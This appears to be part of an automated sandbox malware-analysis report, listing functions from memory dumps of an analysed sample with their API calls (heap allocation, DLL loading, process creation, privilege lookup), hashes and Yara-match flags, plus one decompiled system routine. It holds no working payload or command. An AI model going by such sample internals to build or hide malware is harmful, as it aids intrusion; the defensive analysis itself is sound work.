                                                • Instruction Fuzzy Hash: E090027132118C06E120A15A8414706004597D5241F51C421A4814558D8BD588917162
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a442ee218c761ae66533ac9139ac7a83e63ca5122d6273fd876296fb84b7d491
                                                • Instruction ID: 7183cf44f6624221d3c581cbed6965726a11bf101b95a93deec0f4c4eb9123ef
                                                • Opcode Fuzzy Hash: a442ee218c761ae66533ac9139ac7a83e63ca5122d6273fd876296fb84b7d491
                                                • Instruction Fuzzy Hash: B490026932304806E190B15A541860A004597D5242F91D425A4005558CCE5588697361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3a0018efd5bf19b2ca14fe072a904c3c453c3e4a436b30355a81446d90f4e98c
                                                • Instruction ID: 507591acf32b7f9becaca15c5d63e90ecb4380d3997096a75078bf2d741ed9e2
                                                • Opcode Fuzzy Hash: 3a0018efd5bf19b2ca14fe072a904c3c453c3e4a436b30355a81446d90f4e98c
                                                • Instruction Fuzzy Hash: 4C90027131104C06E190B15A441464A004597D5341F91C025A4015654DCF558A5977E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1aa1acc36c40a712c97021db8a53287d4eafcf89b4225b60f9c402403986e4e3
                                                • Instruction ID: 0c1e606460b0607bae671412410bd1c346768bd33e8681deddafa83f940fd83e
                                                • Opcode Fuzzy Hash: 1aa1acc36c40a712c97021db8a53287d4eafcf89b4225b60f9c402403986e4e3
                                                • Instruction Fuzzy Hash: 8990027131508C46E150B15A4414A46005597D4345F51C021A4054694D9B658D55B6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 037596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1247c256e6f1e66dbf493bb51c304e5c5bde857c55e3ae273db40dbfdd3325c9
                                                • Instruction ID: 387ed555abc394f4f6e99374e53d5f25d6ee3631633b222065c9a91774276891
                                                • Opcode Fuzzy Hash: 1247c256e6f1e66dbf493bb51c304e5c5bde857c55e3ae273db40dbfdd3325c9
                                                • Instruction Fuzzy Hash: 939002713110CC06E120A15A841474A004597D4341F55C421A8414658D8BD588917161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 037596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e33ccb30acac805908ec7dcb85203dff15ed0e28ec15c88ac776e4e7d2c98a24
                                                • Instruction ID: 36e66db7d64a402afae3b2bb8465b7eba8dcc7b55de7ba37e9ac75d3a406f7e7
                                                • Opcode Fuzzy Hash: e33ccb30acac805908ec7dcb85203dff15ed0e28ec15c88ac776e4e7d2c98a24
                                                • Instruction Fuzzy Hash: 2590027131104C46E110A15A4414B46004597E4341F51C026A4114654D8B55C8517561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 00d54e0bc72675fa303e21b0dbd2c52cc1680f77c543e6e098f2751fd44760e1
                                                • Instruction ID: 299682ff307750e06faa59f1efb00e3d2aee2e065bb49e0b309dd58af0677512
                                                • Opcode Fuzzy Hash: 00d54e0bc72675fa303e21b0dbd2c52cc1680f77c543e6e098f2751fd44760e1
                                                • Instruction Fuzzy Hash: 59900265321048071115E55A0714507008697D9391351C031F5005550CDB6188617161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 037595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f9aae06621f04abd135d23f5ec3afcb373ac2ffca7f84f8fd578833bc572edc
                                                • Instruction ID: 423dfe95f272bb9da6fa10e9ebbe4a319e027b44b9cff8538055a64474f5b3f4
                                                • Opcode Fuzzy Hash: 3f9aae06621f04abd135d23f5ec3afcb373ac2ffca7f84f8fd578833bc572edc
                                                • Instruction Fuzzy Hash: 849002A1312048075115B15A4424616404A97E4241B51C031E5004590DCA6588917165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02ECA080, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02EB3AF8), ref: 02ECA0AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 6ead45282d365c8c77932f19a8572f2894026f987c3f8ff9f5968f897c420129
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: B4E046B1200208ABDB18EF99DC49EA777ADEF88750F118558FE089B351C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EB82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02EB834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02EB836B
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 1120a1ff3273dc7bd2404a3293879139ded73d2c7468a4d26c453bc699b36bdb
                                                • Instruction ID: e70443417e7a364c666dfafac9cb38d15e30077a69abb87dca287b4e328728e3
                                                • Opcode Fuzzy Hash: 1120a1ff3273dc7bd2404a3293879139ded73d2c7468a4d26c453bc699b36bdb
                                                • Instruction Fuzzy Hash: 8601A731AC02287BEB21A6D49D02FFF776C6F40B55F158119FF04BA2C0E6A469064AF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02ECA187, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EBF1A2,02EBF1A2,?,00000000,?,?), ref: 02ECA210
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 9ceea577af146f15f75e74266aefb032c1ca47feb00331d883f86114ec9c30a8
                                                • Instruction ID: 994e35f17066611884e29bd4b3f6e0ecb15be30da4fcc3657ad7ad4d177fc3a6
                                                • Opcode Fuzzy Hash: 9ceea577af146f15f75e74266aefb032c1ca47feb00331d883f86114ec9c30a8
                                                • Instruction Fuzzy Hash: 22011BB2240208AFDB14DF89DC45EEB77ADAF88754F118168BA0997251CA30E811CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EBACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02EBAD42
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 40338038c26fc98c5705ab367eec9ae286094f0bf701fb2e8c536a963aaa0826
                                                • Instruction ID: 27c06b65b0b7b8422df4c0681f405e2de3a1fec22d5eaaad1eaf346b41c6ef87
                                                • Opcode Fuzzy Hash: 40338038c26fc98c5705ab367eec9ae286094f0bf701fb2e8c536a963aaa0826
                                                • Instruction Fuzzy Hash: 4A015EB5D4020DABDF10EAE4DD45FDEB7799F04308F1091A9E90997240FA31E7498B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02ECA0F0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02ECA144
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 9135c69dafb1350dfc37f769ff64c52d9e1c58fff2c478f98a710d6ff0f544d3
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 1801AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0D97250C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02ECA0B2, Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(02EC4506,?,02EC4C7F,02EC4C7F,?,02EC4506,?,?,?,?,?,00000000,00000000,?), ref: 02ECA06D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 8a55a1d30db2625fd684d45554dfbc3b31a58fa3774bdaf3e8325e465f2f3b99
                                                • Instruction ID: 3dbb8bce76dcfbc09530b325ae645fe69cdb5abfaac802c3b6937bc679e368ac
                                                • Opcode Fuzzy Hash: 8a55a1d30db2625fd684d45554dfbc3b31a58fa3774bdaf3e8325e465f2f3b99
                                                • Instruction Fuzzy Hash: 67F0F4B52482446FC710DFB49C81DD77BA5EF81304B25899DF8C857602C130E90A8BB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02ECA040, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(02EC4506,?,02EC4C7F,02EC4C7F,?,02EC4506,?,?,?,?,?,00000000,00000000,?), ref: 02ECA06D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: 862062f67492bd43908ac18060c0838318dd577d6e8f819e1494961d109c4a64
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: F8E012B1200208ABDB18EF99DC41EA777ADAF88650F118558BA089B241C630F9118AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02ECA1E0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EBF1A2,02EBF1A2,?,00000000,?,?), ref: 02ECA210
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 81d135f056326606a3c62384edba8fb1231001d0c4dc2f97641fb8eb69844187
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 77E01AB12002086BDB14DF89DC85EE737ADAF88650F118164BA0857241C930E8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EBF698, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,02EB8CF4,?), ref: 02EBF6CB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: bf0c1005770563476216c8f7f59386ff3655066e91c6a81e8822a88eb4e089a7
                                                • Instruction ID: 531e24a19f76019eb5ef2bab7aa50d5fe41cd8225dcc240fa0051ecdc564fd68
                                                • Opcode Fuzzy Hash: bf0c1005770563476216c8f7f59386ff3655066e91c6a81e8822a88eb4e089a7
                                                • Instruction Fuzzy Hash: F5D02BD15B83402EE711FBB05C02F072B050B11304F1A4998E588FF0D7D858D0154235
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EBF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,02EB8CF4,?), ref: 02EBF6CB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 25bed9740bb03e78d731493335abeb5a5df4df6e70947b2bd67e08914e854408
                                                • Instruction ID: d35a2034f2c228b4711984e429f49d34adf621863592536e68b5ab07a6e3786d
                                                • Opcode Fuzzy Hash: 25bed9740bb03e78d731493335abeb5a5df4df6e70947b2bd67e08914e854408
                                                • Instruction Fuzzy Hash: 3BD0A7717D03043BE610FAE49C03F6733CD5B44B04F494064FA48DB3C3D950E4014565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0375967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9c53d21bcb42c3f324a3c9b016c7cd85311a322114853d32e16927a4d4e23741
                                                • Instruction ID: 7c06ae1e292b2f386f418a5295893d4ca9075432bc6c5285c4573704a45a3a65
                                                • Opcode Fuzzy Hash: 9c53d21bcb42c3f324a3c9b016c7cd85311a322114853d32e16927a4d4e23741
                                                • Instruction Fuzzy Hash: CCB09B719024C9C9F615D76146087177944B7D5741F16C061E6020641B4778C095F5B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 037AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E037AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0375CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E037A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E037A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                0x037afdda
                                                0x037afde2
                                                0x037afde5
                                                0x037afdec
                                                0x037afdfa
                                                0x037afdff
                                                0x037afe0a
                                                0x037afe0f
                                                0x037afe17
                                                0x037afe1e
                                                0x037afe19
                                                0x037afe19
                                                0x037afe19
                                                0x037afe20
                                                0x037afe21
                                                0x037afe22
                                                0x037afe25
                                                0x037afe40

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037AFDFA
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037AFE2B
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037AFE01
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: e74816ad56db7ec863f1384f7b04eaadd050bad28eb7ba277e4c5ba20673be22
                                                • Instruction ID: ae2a64a2e0877d44d23dbe522c54ffca407fd13f36942ecc5688439e4019a864
                                                • Opcode Fuzzy Hash: e74816ad56db7ec863f1384f7b04eaadd050bad28eb7ba277e4c5ba20673be22
                                                • Instruction Fuzzy Hash: DEF04C76100601BFD6205B49CC05F37BF5ADB80730F140314F628591D1E962F82086F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%